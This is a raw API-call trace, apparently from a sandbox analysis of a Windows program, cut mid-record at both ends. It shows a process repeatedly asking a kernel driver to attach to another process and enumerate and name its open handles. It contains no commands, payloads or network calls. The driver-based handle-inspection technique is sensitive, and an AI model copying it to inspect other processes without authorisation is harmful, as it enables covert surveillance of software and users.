0x163 [0244.112] ObQueryNameString (in: Object=0xfffff8a0017e3e40, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.113] ObfDereferenceObject (Object=0xfffff8a0017e3e40) returned 0x1 [0244.113] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.113] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.113] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.113] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.113] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.113] PsAcquireProcessExitSynchronization () returned 0x0 [0244.113] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.113] ObReferenceObjectByHandle (in: Handle=0x394, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0017c0900, HandleInformation=0x0) returned 0x0 [0244.113] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.113] PsReleaseProcessExitSynchronization () returned 0x2 [0244.113] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.113] ObQueryNameString (in: Object=0xfffff8a0017c0900, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.113] ObfDereferenceObject (Object=0xfffff8a0017c0900) returned 0x1 [0244.113] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.113] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.113] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.113] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.113] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.113] PsAcquireProcessExitSynchronization () returned 0x0 [0244.113] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.113] ObReferenceObjectByHandle (in: Handle=0x3a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001170410, HandleInformation=0x0) returned 0x0 [0244.113] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.113] PsReleaseProcessExitSynchronization () returned 0x2 [0244.113] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.113] ObQueryNameString (in: Object=0xfffff8a001170410, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.113] ObfDereferenceObject (Object=0xfffff8a001170410) returned 0x1 [0244.113] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.114] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.114] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.114] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.114] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.114] PsAcquireProcessExitSynchronization () returned 0x0 [0244.114] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.114] ObReferenceObjectByHandle (in: Handle=0x3b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0017aa130, HandleInformation=0x0) returned 0x0 [0244.114] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.114] PsReleaseProcessExitSynchronization () returned 0x2 [0244.114] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.114] ObQueryNameString (in: Object=0xfffff8a0017aa130, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.114] ObfDereferenceObject (Object=0xfffff8a0017aa130) returned 0x1 [0244.114] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.114] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.114] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.114] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.114] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.114] PsAcquireProcessExitSynchronization () returned 0x0 [0244.114] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.114] ObReferenceObjectByHandle (in: Handle=0x3c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0014c23e0, HandleInformation=0x0) returned 0x0 [0244.114] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.114] PsReleaseProcessExitSynchronization () returned 0x2 [0244.114] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.114] ObQueryNameString (in: Object=0xfffff8a0014c23e0, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.114] ObfDereferenceObject (Object=0xfffff8a0014c23e0) returned 0x1 [0244.114] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.114] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.114] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.114] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.114] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.114] PsAcquireProcessExitSynchronization () returned 0x0 [0244.114] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.115] ObReferenceObjectByHandle (in: Handle=0x3d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0017b4430, HandleInformation=0x0) returned 0x0 [0244.115] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.115] PsReleaseProcessExitSynchronization () returned 0x2 [0244.115] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.115] ObQueryNameString (in: Object=0xfffff8a0017b4430, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.115] ObfDereferenceObject (Object=0xfffff8a0017b4430) returned 0x1 [0244.115] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.115] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.115] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.115] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.115] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.115] PsAcquireProcessExitSynchronization () returned 0x0 [0244.115] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.115] ObReferenceObjectByHandle (in: Handle=0x3e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0017c7d70, HandleInformation=0x0) returned 0x0 [0244.115] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.115] PsReleaseProcessExitSynchronization () returned 0x2 [0244.115] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.115] ObQueryNameString (in: Object=0xfffff8a0017c7d70, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.115] ObfDereferenceObject (Object=0xfffff8a0017c7d70) returned 0x1 [0244.115] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.115] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.115] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.115] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.115] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.115] PsAcquireProcessExitSynchronization () returned 0x0 [0244.115] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.115] ObReferenceObjectByHandle (in: Handle=0x3f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00122ffc0, HandleInformation=0x0) returned 0x0 [0244.115] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.115] PsReleaseProcessExitSynchronization () returned 0x2 [0244.115] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.116] ObQueryNameString (in: Object=0xfffff8a00122ffc0, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.116] ObfDereferenceObject (Object=0xfffff8a00122ffc0) returned 0x1 [0244.116] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.116] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.116] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.116] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.116] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.116] PsAcquireProcessExitSynchronization () returned 0x0 [0244.116] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.116] ObReferenceObjectByHandle (in: Handle=0x404, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00180c9f0, HandleInformation=0x0) returned 0x0 [0244.116] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.116] PsReleaseProcessExitSynchronization () returned 0x2 [0244.116] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.116] ObQueryNameString (in: Object=0xfffff8a00180c9f0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.116] ObfDereferenceObject (Object=0xfffff8a00180c9f0) returned 0x1 [0244.116] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.116] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.116] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.116] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.116] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.116] PsAcquireProcessExitSynchronization () returned 0x0 [0244.116] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.116] ObReferenceObjectByHandle (in: Handle=0x414, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00180a9d0, HandleInformation=0x0) returned 0x0 [0244.117] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.117] PsReleaseProcessExitSynchronization () returned 0x2 [0244.117] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.117] ObQueryNameString (in: Object=0xfffff8a00180a9d0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.117] ObfDereferenceObject (Object=0xfffff8a00180a9d0) returned 0x1 [0244.117] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.117] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.117] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.117] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.117] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.117] PsAcquireProcessExitSynchronization () returned 0x0 [0244.117] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.117] ObReferenceObjectByHandle (in: Handle=0x424, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00182a7f0, HandleInformation=0x0) returned 0x0 [0244.117] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.117] PsReleaseProcessExitSynchronization () returned 0x2 [0244.117] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.117] ObQueryNameString (in: Object=0xfffff8a00182a7f0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.117] ObfDereferenceObject (Object=0xfffff8a00182a7f0) returned 0x1 [0244.117] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.117] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.117] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.117] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.117] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.117] PsAcquireProcessExitSynchronization () returned 0x0 [0244.117] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.117] ObReferenceObjectByHandle (in: Handle=0x434, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0017c1b00, HandleInformation=0x0) returned 0x0 [0244.117] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.117] PsReleaseProcessExitSynchronization () returned 0x2 [0244.117] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.117] ObQueryNameString (in: Object=0xfffff8a0017c1b00, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.118] ObfDereferenceObject (Object=0xfffff8a0017c1b00) returned 0x1 [0244.118] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.118] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.118] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.118] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.118] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.118] PsAcquireProcessExitSynchronization () returned 0x0 [0244.118] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.118] ObReferenceObjectByHandle (in: Handle=0x444, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0017ec440, HandleInformation=0x0) returned 0x0 [0244.118] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.118] PsReleaseProcessExitSynchronization () returned 0x2 [0244.118] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.118] ObQueryNameString (in: Object=0xfffff8a0017ec440, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.118] ObfDereferenceObject (Object=0xfffff8a0017ec440) returned 0x1 [0244.118] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.118] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.118] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.118] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.118] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.118] PsAcquireProcessExitSynchronization () returned 0x0 [0244.118] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.118] ObReferenceObjectByHandle (in: Handle=0x454, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0017cb710, HandleInformation=0x0) returned 0x0 [0244.118] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.118] PsReleaseProcessExitSynchronization () returned 0x2 [0244.118] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.118] ObQueryNameString (in: Object=0xfffff8a0017cb710, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.118] ObfDereferenceObject (Object=0xfffff8a0017cb710) returned 0x1 [0244.118] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.118] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.118] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.119] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.119] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.119] PsAcquireProcessExitSynchronization () returned 0x0 [0244.119] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.119] ObReferenceObjectByHandle (in: Handle=0x458, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001864ba0, HandleInformation=0x0) returned 0x0 [0244.119] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.119] PsReleaseProcessExitSynchronization () returned 0x2 [0244.119] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.119] ObQueryNameString (in: Object=0xfffff8a001864ba0, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.119] ObfDereferenceObject (Object=0xfffff8a001864ba0) returned 0x1 [0244.119] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.119] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.119] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.119] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.119] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.119] PsAcquireProcessExitSynchronization () returned 0x0 [0244.119] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.119] ObReferenceObjectByHandle (in: Handle=0x464, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0015de660, HandleInformation=0x0) returned 0x0 [0244.119] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.119] PsReleaseProcessExitSynchronization () returned 0x2 [0244.119] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.119] ObQueryNameString (in: Object=0xfffff8a0015de660, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.119] 